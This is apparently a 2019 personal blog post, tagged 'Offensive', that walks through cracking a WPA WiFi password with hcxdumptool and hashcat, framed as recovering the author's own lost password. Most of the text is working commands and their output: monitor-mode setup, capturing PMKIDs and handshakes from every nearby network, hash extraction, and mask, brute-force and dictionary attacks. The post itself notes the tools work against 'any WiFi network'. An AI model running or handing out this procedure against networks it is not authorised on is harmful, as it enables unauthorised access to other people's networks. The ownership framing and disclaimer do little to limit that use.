Offensive

WiFi Access Retrieval

Recently I have been clumsy enough to lose the password of the shared WiFi. Unfortunately, as I did not get any mean to retrieve it and no access to the router, I had to get into it differently.

Disclaimer: You can use this knowledge for good things or bad things. In this blog post, we are speaking about retrieving access to your network. If you decide to use that knowledge for other purposes, this is merely your decision.

Today, we are going to see how to access a WiFi network when you have lost its password. It is one of the ways. There are many. This one worked pretty well because it is quick to obtain the initial data before to try to brute force the password.

For this article we are going to need:

Introduction

We have two tools, hcxdumptool and hashcat. The first one will listen to the network and capture packets. From these packets, we are going to get hashed data, and hashcat is going to help us brute force these hashed data.

The first way to obtain these data is to listen to someone connecting to the router. The authentication has four steps, and we know their structure.

An alternative way is an optional field, the RSN (Robust Security Network) PMKID.

The PMKID (Pairwise Master Key Identifier) contains a hash of the PMK (Pairwise Master Key) and it is what we want to retrieve.

In both cases, it is not possible to reverse a hash. Therefore, we are going to brute force the possibilities to obtain the same hash. When the two hashes match, it means that we found the password. And that we can gain access to the network.

We don't try all the possibilities by asking the router. The brute force operation is done locally. Therefore the router is not impacted by that action.

Installation

I am always used to copy source code of software I want to work with and that are not necessary to the system to run in the /opt/ folder, feel free to do the following operations in another folder, like your home folder, if you feel like it.

```sh

Move in the folder you want to keep the sources in.

cd /opt/

Let's retrieve the source code of the tools we need.

git clone https://github.com/ZerBea/hcxdumptool git clone https://github.com/hashcat/hashcat git clone https://github.com/ZerBea/hcxtools.git

Let's build them and install them

(cd hcxdumptool/ && make && sudo make install) (cd hashcat/ && make && sudo make install) (cd hcxtools/ && make && sudo make install) ```

Congratulations, you are now weaponized to try to access to any WiFi network, but of course, we are always going to use it on the network that we own.

Preparing the network interface

We need to prepare the network interface to monitor the network and be used by hcxdumptool.

During this phase you will loose internet. This blog is a WPA and content should be accessible offline. Therefore if you are lost please come back here!

First let's find your Wifi interface

shell ifconfig |grep wl wlp1s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

Here we can see that the interface is named wlp1s0.

We need to know if some software are going to interfere. To know you can just run hcxdumptool on the interface like that:

shell sudo hcxdumptool -i wlp1s0

If you see lines similar to:

shell initialization... warning: NetworkManager is running with pid 19085 warning: wpa_supplicant is running with pid 19012

You need to deactivate the services, in my case:

shell sudo service wpa_supplicant stop sudo service NetworkManager stop

Now we are going to put it in monitor mode.

``` shell

Set interface down

sudo ip link set wlp1s0 down sudo iwconfig wlp1s0 mode monitor sudo ip link set wlp1s0 up ```

From now on, you should not have internet anymore, if at any moment you wish to stop the procedure, and restore the card to normal state, without having to reboot, simply execute:

shell sudo ip link set wlp1s0 down sudo iwconfig wlp1s0 mode managed sudo ip link set wlp1s0 up sudo service wpa_supplicant start sudo service NetworkManager start

Getting the password

Now we are going to capture the packets we need, and we are also going to do the brute force, these operations are going to let some files, so I would recommend moving to the /tmp/ folder.

shell cd /tmp/

Let's capture packages. It is possible to filter the listening, but in our case we are going to listen to all frequencies and do the filtering later.

If you know which channel to listen to you can specify it with the -c option.

If you want to look at the networks and their channels you can run:

shell sudo hcxdumptool -i wlp1s0 --do_rcascan

```shell

Fullspectrum

sudo hcxdumptool -o capture.pcapng -i wlp1s0

Knowing the network is on channel 10

sudo hcxdumptool -o capture.pcapng -i wlp1s0 -c 10 ```

You should see something like: ``` initialization...

start capturing (stop with ctrl+c) INTERFACE................: wlp1s0 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: e8041029998e MAC ACCESS POINT.........: 000eef9848db (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 64629 ANONCE...................: 5128b8228c2be3c383be6615f4b81f01d168bda5389f3b74329c97cf1fa6baef

INFO: cha=11, rx=2642, rx(dropped)=1533, tx=245, powned=3, err=0 ```

Here the important information is the powned=3 value. It means that we have 3 networks that are sensible to our maneuver.

Let's take a tea for the next 10 minutes and press: ctrl+alt+c.

Once done, we are going to extract from the capture the hashed data we can use for cracking the password.

shell sudo hcxpcaptool capture.pcapng -z capture.16800 -o capture.2500 --network-out=network_hash_name

The -z is to extract the PMKID and the -o is to extract authentication from others.

This will produce three files:

To know if the network you want to retrieve the password for is vulnerable, there are two steps:

First check if the name of the network is not in the capture.2500 file:

shell wlanhcxinfo -i capture.2500 -a -s -e| grep -a <name of the network>

The second step, if you didn't find your network yet, is to cat the network_hash_name and match the corresponding hash to the capture.16800 file.

For example: shell cat network_hash_name

A list of the type: hash:network name will appear, if the hash corresponding to your network is in the capture.16800 then it means that you will be able to attack it.

Easiest way to check without damaging your precious eyes:

shell cat capture.16800|grep <hash>

If it is there congratulation, let's run the brute force and flex our GPUs. If not, it means that probably the PMKID method is not possible. Therefore the only solution is to run hcxdumptool longer and wait for someone to connect to the access point.

If like me you have an android phone with the Wifi password registered (But you can't retrieve it, thank you android), you can connect, and it will speed up significantly the process.

Unfortunately, I only have a laptop with an Intel GPU, and therefore the process is prolonged. Intel GPU and OpenCL also have troubles, and if you are in the same case, you are going to have to deactivate securities. (sounds fun isn't it?)

WARNING: If you receive a message about self test not working with an INTEL GPU/CPU you need to install the intel openCL runtime. Don't try to deactivate self test, it will not return any result in the end.

To install the intel compute runtime.

Here are the instructions you can find on their page:

shell mkdir neo cd neo wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-gmmlib_19.2.3_amd64.deb wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-core_1.0.10-2306_amd64.deb wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-opencl_1.0.10-2306_amd64.deb wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-opencl_19.29.13530_amd64.deb wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-ocloc_19.29.13530_amd64.deb sudo dpkg -i *.deb

In my specific case, I recall the start of the password. So I used a brute force approach trying digits after ibiza131...

Now based on which file contains your network: ```shell

2500

hashcat -m 2500 -a 3 capture.2500 ibiza131?d?d?d --force --increment

16800

hashcat -m 16800 -a 3 capture.16800 ibiza131?d?d?d --force --increment ```

Here ?d means a number, --increment means it will try with various lengths, adding one extra character after exhausting the previous possibilities.

You will see something resembling: shell Session..........: hashcat Status...........: Exhausted Hash.Name........: WPA-EAPOL-PBKDF2 Hash.Target......: capture.2500 Time.Started.....: Tue Jul 30 01:05:07 2019 (18 secs) Time.Estimated...: Tue Jul 30 01:05:25 2019 (0 secs) Guess.Mask.......: ibiza131?d?d?d?d?d [13] Guess.Queue......: 6/7 (85.71%) Speed.#1.........: 5435 H/s (0.29ms) @ Accel:16 Loops:4 Thr:256 Vec:1 Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts Progress.........: 200000/200000 (100.00%) Rejected.........: 0/200000 (0.00%) Restore.Point....: 100000/100000 (100.00%) Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1 Candidates.#1....: ibiza13134373 -> ibiza13173737 Here you can see that we have recovered at least one.

You can check the value in the hashcat potfile: shell cat ~/.hashcat/hashcat.potfile

If I didn't recall the password at all. I could have done a pure brute force of the type: ```shell

2500

hashcat -m 2500 -a 3 capture.2500 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment

16800

hashcat -m 16800 -a 3 capture.16800 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment ```

In this case you can also do a dictionary attack.

```shell

2500

hashcat -m 2500 -a 0 capture.2500 --force my_list_of_passwords

16800

hashcat -m 16800 -a 0 capture.16800 --force my_list_of_passwords ```

You can find many lists of passwords here.

Okay that's all folks. Now that I got back internet I can post this article. Peace out!

By PXke
the 28/07/2019 tags: Offensive, WiFi, Retrieval, Updated: 28/07/2019